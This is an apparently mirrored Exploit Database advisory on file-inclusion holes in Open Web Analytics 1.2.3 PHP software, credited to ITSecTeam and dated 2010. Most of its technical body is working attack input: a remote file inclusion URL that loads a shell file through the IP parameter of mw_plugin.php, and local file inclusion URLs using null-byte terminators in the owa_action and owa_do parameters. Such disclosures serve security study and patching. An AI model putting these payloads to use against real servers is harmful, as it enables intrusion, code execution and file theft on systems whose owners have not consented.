Open Web Analytics 1.2.3 – Multiple File Inclusions

• Exploit Database
• 117 阅读

• 作者： ITSecTeam
  日期： 2010-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11903/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  =========================================================================== ( #Topic: Open Web Analytics 1.2.3 ( #Bug type : multi file include ( #Download : http://downloads.openwebanalytics.com/owa/owa_1_2_3.tar ( #Advisory : =========================================================================== ( #Author : ItSecTeam ( #Email: Bug@ITSecTeam.com ( #Website: http://www.itsecteam.com ( #Forum: http://forum.ITSecTeam.com ( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm ( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!   vuls:=================================================================== path/mw_plugin.php   require_once "$IP/includes/SpecialPage.php";   exploit:===================================================================   rfi : path/mw_plugin.php?IP=shell.txt?   lfi :path/index.php?owa_action=[lfi]%00 lfi :path/index.php?owa_do=[lfi]%00 --------------------------------------